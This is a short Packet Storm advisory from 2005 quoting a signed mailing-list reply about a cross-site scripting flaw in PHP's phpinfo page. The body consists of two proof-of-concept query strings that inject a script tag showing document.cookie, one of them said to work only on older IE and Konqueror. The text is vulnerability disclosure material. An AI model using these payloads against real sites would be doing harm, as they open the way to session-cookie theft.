phpinfoXSS.txt

2005-11-04T00:00:00
ID PACKETSTORM:41282
Type packetstorm
Reporter Packet Storm
Modified 2005-11-04T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
phole@hushmail.com schrieb:  
> PoC:  
> phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>  
  
...or just use  
phpinfo.php?[]=<script>alert(document.cookie);</script>  
  
Saves some typing. In contrary to the above, this one only works on IE  
(tested 6 on XP SP2) & Konqueror (tested 3.4.2), though.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.1 (GNU/Linux)  
  
iD8DBQFDa0S+n6GkvSd/BgwRAr56AJ0aSs+7n00IdUk6HQRd+Akwe2EJIgCeOIm9  
eLVPXP/uSdLOxg5/w1pB2no=  
=C/qI  
-----END PGP SIGNATURE-----  
`